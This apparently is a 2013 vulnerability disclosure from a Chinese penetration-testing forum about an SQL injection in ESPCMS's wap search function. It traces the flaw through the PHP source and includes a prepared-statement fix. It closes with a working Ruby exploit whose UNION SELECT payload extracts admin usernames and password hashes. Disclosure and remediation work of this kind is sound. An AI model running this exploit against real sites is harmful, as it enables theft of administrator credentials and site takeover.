中国网络渗透测试联盟
Title: SQL injection in the search of the espcms wap module
Author: admin
Time: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview

Yisi ESPCMS is an enterprise website management system built on the LAMP stack. It is simple to operate, feature-rich, stable, extensible and secure, and convenient for secondary development and later maintenance, helping you quickly and easily build a powerful, professional corporate website.

Its handling of incoming parameters is not rigorous, which leads to SQL injection.
0x1 Vulnerability details

The variable travels through $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along this path filters it, which is what makes the injection possible.

Because the variable is read from $_SERVER['QUERY_STRING'], it sidesteps the program's own input filtering entirely.

And because the injected variable is an array value rather than an array key, it is not filtered there either; together these produce a rather uncommon SQL injection.
In the in_result function of /interface/3gwap_search.php:
function in_result() {
    ... ... ... ... ... ... ... ... ...
    $urlcode = $_SERVER['QUERY_STRING'];   // raw query string, read outside the normal input filtering
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                $key = addslashes($key);   // the array key is escaped and checked against model_att below ...
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // ... but the array value is concatenated unfiltered: this is the injection point
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);   // $db_where, and with it the raw attr value, reaches the database here
    ... ... ... ... ... ... ... ... ...
}
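The fix is to stop concatenating the attr value (and name) into the query at all. The following is an added example written for this post, not ESPCMS code: a hardened rewrite of the attr loop that whitelists the attribute name through a bound lookup and passes the value as a prepared-statement parameter. It assumes a mysqli connection in $db, the espcms_ table prefix seen in the PoC, and a WHERE 1=1 starting clause in place of the elided part of $db_where.

```php
<?php
// Added example, not ESPCMS code: a hardened rewrite of the attr loop in in_result().
// Assumes a mysqli connection $db and the espcms_ table prefix seen in the PoC.
declare(strict_types=1);

// Returns [where_fragment, bound_values]; the caller binds the values, so neither
// the attribute name nor the attribute value is ever concatenated raw into SQL.
function build_attr_where(mysqli $db, array $attr): array
{
    $fragments = [];
    $params = [];
    foreach ($attr as $key => $value) {
        // parse_str() can also yield nested arrays (attr[x][y]=1); accept scalars only.
        if ((!is_string($value) && !is_int($value)) || $value === '') {
            continue;
        }
        // The column name must be a plain identifier before it is even looked up.
        $key = (string) $key;
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $key)) {
            continue;
        }
        // Same whitelist check as the original (attrname must exist in model_att),
        // but with a bound parameter instead of addslashes().
        $stmt = $db->prepare('SELECT COUNT(*) FROM espcms_model_att WHERE isclass=1 AND attrname=?');
        $stmt->bind_param('s', $key);
        $stmt->execute();
        $stmt->bind_result($count);
        $stmt->fetch();
        $stmt->close();
        if ($count < 1) {
            continue;
        }
        // The value becomes a placeholder; this is the spot the PoC abuses.
        $fragments[] = ' AND b.`' . $key . '`=?';
        $params[] = (string) $value;
    }
    return [implode('', $fragments), $params];
}

// Parse the raw query string exactly as the original does, then run a prepared query.
parse_str(html_entity_decode($_SERVER['QUERY_STRING'] ?? ''), $output);
$attr = is_array($output['attr'] ?? null) ? $output['attr'] : [];
[$attrWhere, $attrParams] = build_attr_where($db, $attr);
$sql = 'SELECT b.*,a.* FROM espcms_document AS a LEFT JOIN espcms_document_attr AS b'
     . ' ON a.did=b.did WHERE 1=1' . $attrWhere . ' LIMIT 0,15';
$stmt = $db->prepare($sql);
if ($attrParams !== []) {
    $stmt->bind_param(str_repeat('s', count($attrParams)), ...$attrParams);
}
$stmt->execute();
$rs = $stmt->get_result(); // requires mysqlnd; use bind_result() otherwise
```

With the value bound, a payload such as the PoC's attr[jobnum] is compared literally against the column and can no longer alter the statement.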
0x2 PoC
require "net/http"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "\nsend request..."
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&" +
        "attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" +
        ",14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" +
        ",28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)